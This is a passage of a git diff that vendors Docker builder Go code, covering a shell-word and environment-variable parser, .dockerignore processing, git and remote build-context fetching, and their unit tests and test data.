rune + + for pos := 0; pos <= len(line); pos++ { + if pos != len(line) { + ch = rune(line[pos]) + } + + if phase == inSpaces { // Looking for start of word + if pos == len(line) { // end of input + break + } + if unicode.IsSpace(ch) { // skip spaces + continue + } + + // Only keep going if the next word starts with -- + if ch != '-' || pos+1 == len(line) || rune(line[pos+1]) != '-' { + return line[pos:], words, nil + } + + phase = inWord // found someting with "--", fall through + } + if (phase == inWord || phase == inQuote) && (pos == len(line)) { + if word != "--" && (blankOK || len(word) > 0) { + words = append(words, word) + } + break + } + if phase == inWord { + if unicode.IsSpace(ch) { + phase = inSpaces + if word == "--" { + return line[pos:], words, nil + } + if blankOK || len(word) > 0 { + words = append(words, word) + } + word = "" + blankOK = false + continue 
+ } + if ch == '\'' || ch == '"' { + quote = ch + blankOK = true + phase = inQuote + continue + } + if ch == '\\' { + if pos+1 == len(line) { + continue // just skip \ at end + } + pos++ + ch = rune(line[pos]) + } + word += string(ch) + continue + } + if phase == inQuote { + if ch == quote { + phase = inWord + continue + } + if ch == '\\' { + if pos+1 == len(line) { + phase = inWord + continue // just skip \ at end + } + pos++ + ch = rune(line[pos]) + } + word += string(ch) + } + } + + return "", words, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go new file mode 100644 index 0000000000..189afd1fdb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go @@ -0,0 +1,329 @@ +package dockerfile + +// This will take a single word and an array of env variables and +// process all quotes (" and ') as well as $xxx and ${xxx} env variable +// tokens. Tries to mimic bash shell process. +// It doesn't support all flavors of ${xx:...} formats but new ones can +// be added by adding code to the "special ${} format processing" section + +import ( + "fmt" + "runtime" + "strings" + "text/scanner" + "unicode" +) + +type shellWord struct { + word string + scanner scanner.Scanner + envs []string + pos int + escapeToken rune +} + +// ProcessWord will use the 'env' list of environment variables, +// and replace any env var references in 'word'. 
+func ProcessWord(word string, env []string, escapeToken rune) (string, error) { + sw := &shellWord{ + word: word, + envs: env, + pos: 0, + escapeToken: escapeToken, + } + sw.scanner.Init(strings.NewReader(word)) + word, _, err := sw.process() + return word, err +} + +// ProcessWords will use the 'env' list of environment variables, +// and replace any env var references in 'word' then it will also +// return a slice of strings which represents the 'word' +// split up based on spaces - taking into account quotes. Note that +// this splitting is done **after** the env var substitutions are done. +// Note, each one is trimmed to remove leading and trailing spaces (unless +// they are quoted", but ProcessWord retains spaces between words. +func ProcessWords(word string, env []string, escapeToken rune) ([]string, error) { + sw := &shellWord{ + word: word, + envs: env, + pos: 0, + escapeToken: escapeToken, + } + sw.scanner.Init(strings.NewReader(word)) + _, words, err := sw.process() + return words, err +} + +func (sw *shellWord) process() (string, []string, error) { + return sw.processStopOn(scanner.EOF) +} + +type wordsStruct struct { + word string + words []string + inWord bool +} + +func (w *wordsStruct) addChar(ch rune) { + if unicode.IsSpace(ch) && w.inWord { + if len(w.word) != 0 { + w.words = append(w.words, w.word) + w.word = "" + w.inWord = false + } + } else if !unicode.IsSpace(ch) { + w.addRawChar(ch) + } +} + +func (w *wordsStruct) addRawChar(ch rune) { + w.word += string(ch) + w.inWord = true +} + +func (w *wordsStruct) addString(str string) { + var scan scanner.Scanner + scan.Init(strings.NewReader(str)) + for scan.Peek() != scanner.EOF { + w.addChar(scan.Next()) + } +} + +func (w *wordsStruct) addRawString(str string) { + w.word += str + w.inWord = true +} + +func (w *wordsStruct) getWords() []string { + if len(w.word) > 0 { + w.words = append(w.words, w.word) + + // Just in case we're called again by mistake + w.word = "" + w.inWord = false + } + return 
w.words +} + +// Process the word, starting at 'pos', and stop when we get to the +// end of the word or the 'stopChar' character +func (sw *shellWord) processStopOn(stopChar rune) (string, []string, error) { + var result string + var words wordsStruct + + var charFuncMapping = map[rune]func() (string, error){ + '\'': sw.processSingleQuote, + '"': sw.processDoubleQuote, + '$': sw.processDollar, + } + + for sw.scanner.Peek() != scanner.EOF { + ch := sw.scanner.Peek() + + if stopChar != scanner.EOF && ch == stopChar { + sw.scanner.Next() + break + } + if fn, ok := charFuncMapping[ch]; ok { + // Call special processing func for certain chars + tmp, err := fn() + if err != nil { + return "", []string{}, err + } + result += tmp + + if ch == rune('$') { + words.addString(tmp) + } else { + words.addRawString(tmp) + } + } else { + // Not special, just add it to the result + ch = sw.scanner.Next() + + if ch == sw.escapeToken { + // '\' (default escape token, but ` allowed) escapes, except end of line + + ch = sw.scanner.Next() + + if ch == scanner.EOF { + break + } + + words.addRawChar(ch) + } else { + words.addChar(ch) + } + + result += string(ch) + } + } + + return result, words.getWords(), nil +} + +func (sw *shellWord) processSingleQuote() (string, error) { + // All chars between single quotes are taken as-is + // Note, you can't escape ' + var result string + + sw.scanner.Next() + + for { + ch := sw.scanner.Next() + if ch == '\'' || ch == scanner.EOF { + break + } + result += string(ch) + } + + return result, nil +} + +func (sw *shellWord) processDoubleQuote() (string, error) { + // All chars up to the next " are taken as-is, even ', except any $ chars + // But you can escape " with a \ (or ` if escape token set accordingly) + var result string + + sw.scanner.Next() + + for sw.scanner.Peek() != scanner.EOF { + ch := sw.scanner.Peek() + if ch == '"' { + sw.scanner.Next() + break + } + if ch == '$' { + tmp, err := sw.processDollar() + if err != nil { + return "", err + } 
+ result += tmp + } else { + ch = sw.scanner.Next() + if ch == sw.escapeToken { + chNext := sw.scanner.Peek() + + if chNext == scanner.EOF { + // Ignore \ at end of word + continue + } + + if chNext == '"' || chNext == '$' { + // \" and \$ can be escaped, all other \'s are left as-is + ch = sw.scanner.Next() + } + } + result += string(ch) + } + } + + return result, nil +} + +func (sw *shellWord) processDollar() (string, error) { + sw.scanner.Next() + ch := sw.scanner.Peek() + if ch == '{' { + sw.scanner.Next() + name := sw.processName() + ch = sw.scanner.Peek() + if ch == '}' { + // Normal ${xx} case + sw.scanner.Next() + return sw.getEnv(name), nil + } + if ch == ':' { + // Special ${xx:...} format processing + // Yes it allows for recursive $'s in the ... spot + + sw.scanner.Next() // skip over : + modifier := sw.scanner.Next() + + word, _, err := sw.processStopOn('}') + if err != nil { + return "", err + } + + // Grab the current value of the variable in question so we + // can use to to determine what to do based on the modifier + newValue := sw.getEnv(name) + + switch modifier { + case '+': + if newValue != "" { + newValue = word + } + return newValue, nil + + case '-': + if newValue == "" { + newValue = word + } + return newValue, nil + + default: + return "", fmt.Errorf("Unsupported modifier (%c) in substitution: %s", modifier, sw.word) + } + } + return "", fmt.Errorf("Missing ':' in substitution: %s", sw.word) + } + // $xxx case + name := sw.processName() + if name == "" { + return "$", nil + } + return sw.getEnv(name), nil +} + +func (sw *shellWord) processName() string { + // Read in a name (alphanumeric or _) + // If it starts with a numeric then just return $# + var name string + + for sw.scanner.Peek() != scanner.EOF { + ch := sw.scanner.Peek() + if len(name) == 0 && unicode.IsDigit(ch) { + ch = sw.scanner.Next() + return string(ch) + } + if !unicode.IsLetter(ch) && !unicode.IsDigit(ch) && ch != '_' { + break + } + ch = sw.scanner.Next() + name += 
string(ch) + } + + return name +} + +func (sw *shellWord) getEnv(name string) string { + if runtime.GOOS == "windows" { + // Case-insensitive environment variables on Windows + name = strings.ToUpper(name) + } + for _, env := range sw.envs { + i := strings.Index(env, "=") + if i < 0 { + if runtime.GOOS == "windows" { + env = strings.ToUpper(env) + } + if name == env { + // Should probably never get here, but just in case treat + // it like "var" and "var=" are the same + return "" + } + continue + } + compareName := env[:i] + if runtime.GOOS == "windows" { + compareName = strings.ToUpper(compareName) + } + if name != compareName { + continue + } + return env[i+1:] + } + return "" +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go new file mode 100644 index 0000000000..6cf691c077 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go @@ -0,0 +1,155 @@ +package dockerfile + +import ( + "bufio" + "os" + "runtime" + "strings" + "testing" +) + +func TestShellParser4EnvVars(t *testing.T) { + fn := "envVarTest" + lineCount := 0 + + file, err := os.Open(fn) + if err != nil { + t.Fatalf("Can't open '%s': %s", err, fn) + } + defer file.Close() + + scanner := bufio.NewScanner(file) + envs := []string{"PWD=/home", "SHELL=bash", "KOREAN=한국어"} + for scanner.Scan() { + line := scanner.Text() + lineCount++ + + // Trim comments and blank lines + i := strings.Index(line, "#") + if i >= 0 { + line = line[:i] + } + line = strings.TrimSpace(line) + + if line == "" { + continue + } + + words := strings.Split(line, "|") + if len(words) != 3 { + t.Fatalf("Error in '%s' - should be exactly one | in:%q", fn, line) + } + + words[0] = strings.TrimSpace(words[0]) + words[1] = strings.TrimSpace(words[1]) + words[2] = strings.TrimSpace(words[2]) + + // Key W=Windows; A=All; U=Unix + if (words[0] != "W") && (words[0] != "A") && (words[0] != "U") { + 
t.Fatalf("Invalid tag %s at line %d of %s. Must be W, A or U", words[0], lineCount, fn) + } + + if ((words[0] == "W" || words[0] == "A") && runtime.GOOS == "windows") || + ((words[0] == "U" || words[0] == "A") && runtime.GOOS != "windows") { + newWord, err := ProcessWord(words[1], envs, '\\') + + if err != nil { + newWord = "error" + } + + if newWord != words[2] { + t.Fatalf("Error. Src: %s Calc: %s Expected: %s at line %d", words[1], newWord, words[2], lineCount) + } + } + } +} + +func TestShellParser4Words(t *testing.T) { + fn := "wordsTest" + + file, err := os.Open(fn) + if err != nil { + t.Fatalf("Can't open '%s': %s", err, fn) + } + defer file.Close() + + envs := []string{} + scanner := bufio.NewScanner(file) + for scanner.Scan() { + line := scanner.Text() + + if strings.HasPrefix(line, "#") { + continue + } + + if strings.HasPrefix(line, "ENV ") { + line = strings.TrimLeft(line[3:], " ") + envs = append(envs, line) + continue + } + + words := strings.Split(line, "|") + if len(words) != 2 { + t.Fatalf("Error in '%s' - should be exactly one | in: %q", fn, line) + } + test := strings.TrimSpace(words[0]) + expected := strings.Split(strings.TrimLeft(words[1], " "), ",") + + result, err := ProcessWords(test, envs, '\\') + + if err != nil { + result = []string{"error"} + } + + if len(result) != len(expected) { + t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result) + } + for i, w := range expected { + if w != result[i] { + t.Fatalf("Error. 
%q was suppose to result in %q, but got %q instead", test, expected, result) + } + } + } +} + +func TestGetEnv(t *testing.T) { + sw := &shellWord{ + word: "", + envs: nil, + pos: 0, + } + + sw.envs = []string{} + if sw.getEnv("foo") != "" { + t.Fatalf("2 - 'foo' should map to ''") + } + + sw.envs = []string{"foo"} + if sw.getEnv("foo") != "" { + t.Fatalf("3 - 'foo' should map to ''") + } + + sw.envs = []string{"foo="} + if sw.getEnv("foo") != "" { + t.Fatalf("4 - 'foo' should map to ''") + } + + sw.envs = []string{"foo=bar"} + if sw.getEnv("foo") != "bar" { + t.Fatalf("5 - 'foo' should map to 'bar'") + } + + sw.envs = []string{"foo=bar", "car=hat"} + if sw.getEnv("foo") != "bar" { + t.Fatalf("6 - 'foo' should map to 'bar'") + } + if sw.getEnv("car") != "hat" { + t.Fatalf("7 - 'car' should map to 'hat'") + } + + // Make sure we grab the first 'car' in the list + sw.envs = []string{"foo=bar", "car=hat", "car=bike"} + if sw.getEnv("car") != "hat" { + t.Fatalf("8 - 'car' should map to 'hat'") + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support.go b/vendor/github.com/docker/docker/builder/dockerfile/support.go new file mode 100644 index 0000000000..e87588910b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/support.go @@ -0,0 +1,19 @@ +package dockerfile + +import "strings" + +// handleJSONArgs parses command passed to CMD, ENTRYPOINT, RUN and SHELL instruction in Dockerfile +// for exec form it returns untouched args slice +// for shell form it returns concatenated args as the first element of a slice +func handleJSONArgs(args []string, attributes map[string]bool) []string { + if len(args) == 0 { + return []string{} + } + + if attributes != nil && attributes["json"] { + return args + } + + // literal string command, not an exec array + return []string{strings.Join(args, " ")} +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go 
b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go new file mode 100644 index 0000000000..7cc6fe9dcb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go @@ -0,0 +1,65 @@ +package dockerfile + +import "testing" + +type testCase struct { + name string + args []string + attributes map[string]bool + expected []string +} + +func initTestCases() []testCase { + testCases := []testCase{} + + testCases = append(testCases, testCase{ + name: "empty args", + args: []string{}, + attributes: make(map[string]bool), + expected: []string{}, + }) + + jsonAttributes := make(map[string]bool) + jsonAttributes["json"] = true + + testCases = append(testCases, testCase{ + name: "json attribute with one element", + args: []string{"foo"}, + attributes: jsonAttributes, + expected: []string{"foo"}, + }) + + testCases = append(testCases, testCase{ + name: "json attribute with two elements", + args: []string{"foo", "bar"}, + attributes: jsonAttributes, + expected: []string{"foo", "bar"}, + }) + + testCases = append(testCases, testCase{ + name: "no attributes", + args: []string{"foo", "bar"}, + attributes: nil, + expected: []string{"foo bar"}, + }) + + return testCases +} + +func TestHandleJSONArgs(t *testing.T) { + testCases := initTestCases() + + for _, test := range testCases { + arguments := handleJSONArgs(test.args, test.attributes) + + if len(arguments) != len(test.expected) { + t.Fatalf("In test \"%s\": length of returned slice is incorrect. Expected: %d, got: %d", test.name, len(test.expected), len(arguments)) + } + + for i := range test.expected { + if arguments[i] != test.expected[i] { + t.Fatalf("In test \"%s\": element as position %d is incorrect. 
Expected: %s, got: %s", test.name, i, test.expected[i], arguments[i]) + } + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go new file mode 100644 index 0000000000..80a3f1babf --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go @@ -0,0 +1,50 @@ +package dockerfile + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +// createTestTempDir creates a temporary directory for testing. +// It returns the created path and a cleanup function which is meant to be used as deferred call. +// When an error occurs, it terminates the test. +func createTestTempDir(t *testing.T, dir, prefix string) (string, func()) { + path, err := ioutil.TempDir(dir, prefix) + + if err != nil { + t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err) + } + + return path, func() { + err = os.RemoveAll(path) + + if err != nil { + t.Fatalf("Error when removing directory %s: %s", path, err) + } + } +} + +// createTestTempFile creates a temporary file within dir with specific contents and permissions. 
+// When an error occurs, it terminates the test +func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.FileMode) string { + filePath := filepath.Join(dir, filename) + err := ioutil.WriteFile(filePath, []byte(contents), perm) + + if err != nil { + t.Fatalf("Error when creating %s file: %s", filename, err) + } + + return filePath +} + +// createTestSymlink creates a symlink file within dir which points to oldname +func createTestSymlink(t *testing.T, dir, filename, oldname string) string { + filePath := filepath.Join(dir, filename) + if err := os.Symlink(oldname, filePath); err != nil { + t.Fatalf("Error when creating %s symlink to %s: %s", filename, oldname, err) + } + + return filePath +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest new file mode 100644 index 0000000000..fa916c67f9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest @@ -0,0 +1,25 @@ +hello | hello +hello${hi}bye | hellobye +ENV hi=hi +hello${hi}bye | hellohibye +ENV space=abc def +hello${space}bye | helloabc,defbye +hello"${space}"bye | helloabc defbye +hello "${space}"bye | hello,abc defbye +ENV leading= ab c +hello${leading}def | hello,ab,cdef +hello"${leading}" def | hello ab c,def +hello"${leading}" | hello ab c +hello${leading} | hello,ab,c +# next line MUST have 3 trailing spaces, don't erase them! +ENV trailing=ab c +hello${trailing} | helloab,c +hello${trailing}d | helloab,c,d +hello"${trailing}"d | helloab c d +# next line MUST have 3 trailing spaces, don't erase them! 
+hel"lo${trailing}" | helloab c +hello" there " | hello there +hello there | hello,there +hello\ there | hello there +hello" there | hello there +hello\" there | hello",there diff --git a/vendor/github.com/docker/docker/builder/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore.go new file mode 100644 index 0000000000..3da7913367 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore.go @@ -0,0 +1,48 @@ +package builder + +import ( + "os" + + "github.com/docker/docker/builder/dockerignore" + "github.com/docker/docker/pkg/fileutils" +) + +// DockerIgnoreContext wraps a ModifiableContext to add a method +// for handling the .dockerignore file at the root of the context. +type DockerIgnoreContext struct { + ModifiableContext +} + +// Process reads the .dockerignore file at the root of the embedded context. +// If .dockerignore does not exist in the context, then nil is returned. +// +// It can take a list of files to be removed after .dockerignore is removed. +// This is used for server-side implementations of builders that need to send +// the .dockerignore file as well as the special files specified in filesToRemove, +// but expect them to be excluded from the context after they were processed. +// +// For example, server-side Dockerfile builders are expected to pass in the name +// of the Dockerfile to be removed after it was parsed. +// +// TODO: Don't require a ModifiableContext (use Context instead) and don't remove +// files, instead handle a list of files to be excluded from the context. +func (c DockerIgnoreContext) Process(filesToRemove []string) error { + f, err := c.Open(".dockerignore") + // Note that a missing .dockerignore file isn't treated as an error + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + excludes, _ := dockerignore.ReadAll(f) + f.Close() + filesToRemove = append([]string{".dockerignore"}, filesToRemove...) 
+ for _, fileToRemove := range filesToRemove { + rm, _ := fileutils.Matches(fileToRemove, excludes) + if rm { + c.Remove(fileToRemove) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go new file mode 100644 index 0000000000..2db67be799 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go @@ -0,0 +1,49 @@ +package dockerignore + +import ( + "bufio" + "bytes" + "fmt" + "io" + "path/filepath" + "strings" +) + +// ReadAll reads a .dockerignore file and returns the list of file patterns +// to ignore. Note this will trim whitespace from each line as well +// as use GO's "clean" func to get the shortest/cleanest path for each. +func ReadAll(reader io.Reader) ([]string, error) { + if reader == nil { + return nil, nil + } + + scanner := bufio.NewScanner(reader) + var excludes []string + currentLine := 0 + + utf8bom := []byte{0xEF, 0xBB, 0xBF} + for scanner.Scan() { + scannedBytes := scanner.Bytes() + // We trim UTF8 BOM + if currentLine == 0 { + scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) + } + pattern := string(scannedBytes) + currentLine++ + // Lines starting with # (comments) are ignored before processing + if strings.HasPrefix(pattern, "#") { + continue + } + pattern = strings.TrimSpace(pattern) + if pattern == "" { + continue + } + pattern = filepath.Clean(pattern) + pattern = filepath.ToSlash(pattern) + excludes = append(excludes, pattern) + } + if err := scanner.Err(); err != nil { + return nil, fmt.Errorf("Error reading .dockerignore: %v", err) + } + return excludes, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go new file mode 100644 index 0000000000..612a1399cd --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go @@ -0,0 +1,57 @@ 
+package dockerignore + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestReadAll(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "dockerignore-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + di, err := ReadAll(nil) + if err != nil { + t.Fatalf("Expected not to have error, got %v", err) + } + + if diLen := len(di); diLen != 0 { + t.Fatalf("Expected to have zero dockerignore entry, got %d", diLen) + } + + diName := filepath.Join(tmpDir, ".dockerignore") + content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile") + err = ioutil.WriteFile(diName, []byte(content), 0777) + if err != nil { + t.Fatal(err) + } + + diFd, err := os.Open(diName) + if err != nil { + t.Fatal(err) + } + defer diFd.Close() + + di, err = ReadAll(diFd) + if err != nil { + t.Fatal(err) + } + + if di[0] != "test1" { + t.Fatalf("First element is not test1") + } + if di[1] != "/test2" { + t.Fatalf("Second element is not /test2") + } + if di[2] != "/a/file/here" { + t.Fatalf("Third element is not /a/file/here") + } + if di[3] != "lastfile" { + t.Fatalf("Fourth element is not lastfile") + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore_test.go new file mode 100644 index 0000000000..3c0ceda4cf --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerignore_test.go @@ -0,0 +1,95 @@ +package builder + +import ( + "io/ioutil" + "log" + "os" + "sort" + "testing" +) + +const shouldStayFilename = "should_stay" + +func extractFilenames(files []os.FileInfo) []string { + filenames := make([]string, len(files), len(files)) + + for i, file := range files { + filenames[i] = file.Name() + } + + return filenames +} + +func checkDirectory(t *testing.T, dir string, expectedFiles []string) { + files, err := ioutil.ReadDir(dir) + + if err != nil { + t.Fatalf("Could not read directory: %s", err) + } + + if len(files) != len(expectedFiles) { + 
log.Fatalf("Directory should contain exactly %d file(s), got %d", len(expectedFiles), len(files)) + } + + filenames := extractFilenames(files) + sort.Strings(filenames) + sort.Strings(expectedFiles) + + for i, filename := range filenames { + if filename != expectedFiles[i] { + t.Fatalf("File %s should be in the directory, got: %s", expectedFiles[i], filename) + } + } +} + +func executeProcess(t *testing.T, contextDir string) { + modifiableCtx := &tarSumContext{root: contextDir} + ctx := DockerIgnoreContext{ModifiableContext: modifiableCtx} + + err := ctx.Process([]string{DefaultDockerfileName}) + + if err != nil { + t.Fatalf("Error when executing Process: %s", err) + } +} + +func TestProcessShouldRemoveDockerfileDockerignore(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test") + defer cleanup() + + createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) + createTestTempFile(t, contextDir, dockerignoreFilename, "Dockerfile\n.dockerignore", 0777) + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + executeProcess(t, contextDir) + + checkDirectory(t, contextDir, []string{shouldStayFilename}) + +} + +func TestProcessNoDockerignore(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test") + defer cleanup() + + createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + executeProcess(t, contextDir) + + checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName}) + +} + +func TestProcessShouldLeaveAllFiles(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test") + defer cleanup() + + createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + 
createTestTempFile(t, contextDir, dockerignoreFilename, "input1\ninput2", 0777) + + executeProcess(t, contextDir) + + checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName, dockerignoreFilename}) + +} diff --git a/vendor/github.com/docker/docker/builder/git.go b/vendor/github.com/docker/docker/builder/git.go new file mode 100644 index 0000000000..74df244611 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/git.go @@ -0,0 +1,28 @@ +package builder + +import ( + "os" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/gitutils" +) + +// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory. +func MakeGitContext(gitURL string) (ModifiableContext, error) { + root, err := gitutils.Clone(gitURL) + if err != nil { + return nil, err + } + + c, err := archive.Tar(root, archive.Uncompressed) + if err != nil { + return nil, err + } + + defer func() { + // TODO: print errors? + c.Close() + os.RemoveAll(root) + }() + return MakeTarSumContext(c) +} diff --git a/vendor/github.com/docker/docker/builder/remote.go b/vendor/github.com/docker/docker/builder/remote.go new file mode 100644 index 0000000000..f3a4329d16 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remote.go @@ -0,0 +1,157 @@ +package builder + +import ( + "bytes" + "errors" + "fmt" + "io" + "io/ioutil" + "regexp" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/urlutil" +) + +// When downloading remote contexts, limit the amount (in bytes) +// to be read from the response body in order to detect its Content-Type +const maxPreambleLength = 100 + +const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))` + +var mimeRe = regexp.MustCompile(acceptableRemoteMIME) + +// MakeRemoteContext downloads a context from remoteURL and returns it. 
+// +// If contentTypeHandlers is non-nil, then the Content-Type header is read along with a maximum of +// maxPreambleLength bytes from the body to help detecting the MIME type. +// Look at acceptableRemoteMIME for more details. +// +// If a match is found, then the body is sent to the contentType handler and a (potentially compressed) tar stream is expected +// to be returned. If no match is found, it is assumed the body is a tar stream (compressed or not). +// In either case, an (assumed) tar stream is passed to MakeTarSumContext whose result is returned. +func MakeRemoteContext(remoteURL string, contentTypeHandlers map[string]func(io.ReadCloser) (io.ReadCloser, error)) (ModifiableContext, error) { + f, err := httputils.Download(remoteURL) + if err != nil { + return nil, fmt.Errorf("error downloading remote context %s: %v", remoteURL, err) + } + defer f.Body.Close() + + var contextReader io.ReadCloser + if contentTypeHandlers != nil { + contentType := f.Header.Get("Content-Type") + clen := f.ContentLength + + contentType, contextReader, err = inspectResponse(contentType, f.Body, clen) + if err != nil { + return nil, fmt.Errorf("error detecting content type for remote %s: %v", remoteURL, err) + } + defer contextReader.Close() + + // This loop tries to find a content-type handler for the detected content-type. + // If it could not find one from the caller-supplied map, it tries the empty content-type `""` + // which is interpreted as a fallback handler (usually used for raw tar contexts). + for _, ct := range []string{contentType, ""} { + if fn, ok := contentTypeHandlers[ct]; ok { + defer contextReader.Close() + if contextReader, err = fn(contextReader); err != nil { + return nil, err + } + break + } + } + } + + // Pass through - this is a pre-packaged context, presumably + // with a Dockerfile with the right name inside it. 
+ return MakeTarSumContext(contextReader) +} + +// DetectContextFromRemoteURL returns a context and in certain cases the name of the dockerfile to be used +// irrespective of user input. +// progressReader is only used if remoteURL is actually a URL (not empty, and not a Git endpoint). +func DetectContextFromRemoteURL(r io.ReadCloser, remoteURL string, createProgressReader func(in io.ReadCloser) io.ReadCloser) (context ModifiableContext, dockerfileName string, err error) { + switch { + case remoteURL == "": + context, err = MakeTarSumContext(r) + case urlutil.IsGitURL(remoteURL): + context, err = MakeGitContext(remoteURL) + case urlutil.IsURL(remoteURL): + context, err = MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){ + httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) { + dockerfile, err := ioutil.ReadAll(rc) + if err != nil { + return nil, err + } + + // dockerfileName is set to signal that the remote was interpreted as a single Dockerfile, in which case the caller + // should use dockerfileName as the new name for the Dockerfile, irrespective of any other user input. + dockerfileName = DefaultDockerfileName + + // TODO: return a context without tarsum + r, err := archive.Generate(dockerfileName, string(dockerfile)) + if err != nil { + return nil, err + } + + return ioutil.NopCloser(r), nil + }, + // fallback handler (tar context) + "": func(rc io.ReadCloser) (io.ReadCloser, error) { + return createProgressReader(rc), nil + }, + }) + default: + err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL) + } + return +} + +// inspectResponse looks into the http response data at r to determine whether its +// content-type is on the list of acceptable content types for remote build contexts. 
+// This function returns: +// - a string representation of the detected content-type +// - an io.Reader for the response body +// - an error value which will be non-nil either when something goes wrong while +// reading bytes from r or when the detected content-type is not acceptable. +func inspectResponse(ct string, r io.ReadCloser, clen int64) (string, io.ReadCloser, error) { + plen := clen + if plen <= 0 || plen > maxPreambleLength { + plen = maxPreambleLength + } + + preamble := make([]byte, plen, plen) + rlen, err := r.Read(preamble) + if rlen == 0 { + return ct, r, errors.New("empty response") + } + if err != nil && err != io.EOF { + return ct, r, err + } + + preambleR := bytes.NewReader(preamble) + bodyReader := ioutil.NopCloser(io.MultiReader(preambleR, r)) + // Some web servers will use application/octet-stream as the default + // content type for files without an extension (e.g. 'Dockerfile') + // so if we receive this value we better check for text content + contentType := ct + if len(ct) == 0 || ct == httputils.MimeTypes.OctetStream { + contentType, _, err = httputils.DetectContentType(preamble) + if err != nil { + return contentType, bodyReader, err + } + } + + contentType = selectAcceptableMIME(contentType) + var cterr error + if len(contentType) == 0 { + cterr = fmt.Errorf("unsupported Content-Type %q", ct) + contentType = ct + } + + return contentType, bodyReader, cterr +} + +func selectAcceptableMIME(ct string) string { + return mimeRe.FindString(ct) +} diff --git a/vendor/github.com/docker/docker/builder/remote_test.go b/vendor/github.com/docker/docker/builder/remote_test.go new file mode 100644 index 0000000000..691a084761 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remote_test.go @@ -0,0 +1,213 @@ +package builder + +import ( + "bytes" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "testing" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" +) + +var binaryContext = 
